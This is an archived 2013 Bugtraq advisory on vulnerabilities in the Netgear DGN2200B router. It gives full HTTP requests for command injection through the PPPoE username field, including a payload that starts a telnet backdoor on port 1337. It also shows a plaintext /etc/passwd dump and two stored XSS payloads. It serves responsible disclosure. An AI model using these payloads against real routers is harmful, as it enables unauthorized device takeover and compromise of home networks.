| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 16 Feb 2013 20:10:04 GMT From: devnull@...ur1ty.de To: bugtraq@...urityfocus.com Subject: Multiple Vulnerabilities in Netgear DGN2200B Device Name: DGN2200B Vendor: Netgear ============ Vulnerable Firmware Releases: ============ Hardwareversion DGN2200B Firmwareversion V1.0.0.36_7.0.36 - 04/01/2011 ============ Device Description: ============ Infos: http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx# Firmware download: http://kb.netgear.com/app/answers/detail/a_id/18990/~/dgn2200%2Fdgn2200b-firmware-version-1.0.0.36 ============ Shodan Torks ============ Shodan Search: NETGEAR DGN2200 ============ Vulnerability Overview: ============ * OS Command Injection in the PPOE configuration: The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. Param: pppoe_username Example Request: POST /pppoe.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/BAS_pppoe.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 593 Connection: close login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0 => wait around 30 seconds till the configuration is saved and activated start telnetd on port 1337: %26%20telnetd -p 1337%20%26 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: ~ # cat /etc/passwd nobody:*:0:0:nobody:/:/bin/sh admin:password:0:0:admin:/:/bin/sh guest:guest:0:0:guest:/:/bin/sh ~ # * stored XSS Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Zugriffsbeschränkungen -> Dienste -> neuen Dienst anlegen -> Dienstname Param: userdefined Original request: POST /fw_serv_add.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/fw_serv.cgi Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 114 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 You could also change the request method to HTTP GET: http://192.168.0.1/fw_serv_add.cgi?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0 The scriptcode gets executed if you try to edit this service again. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png * stored XSS: Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Wireless-Konfiguration -> Netzwerkname (SSID) Param: ssid POST /wlg_sec_profile_main.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.0.1/WLG_wireless2_2.htm Cookie: uid=vjkqK779eJ Authorization: Basic xxxx= Content-Type: application/x-www-form-urlencoded Content-Length: 328 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0 ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de http://www.s3cur1ty.de/m1adv2013-015 Twitter: @s3cur1ty_de ============ Time Line: ============ 17.12.2012 - discovered vulnerability 18.12.2012 - Privately reported all details to vendor 18.12.2012 - vendor responded that they will check the reported vulnerability details 29.01.2013 - vendor contacted me to test a new firmware 29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware 30.01.2013 - vendor reponded that I should just check it 31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!) 11.02.2013 - vendor responded that he has to declare it internally 15.02.2013 - public release ===================== Advisory end =====================
Powered by blists - more mailing lists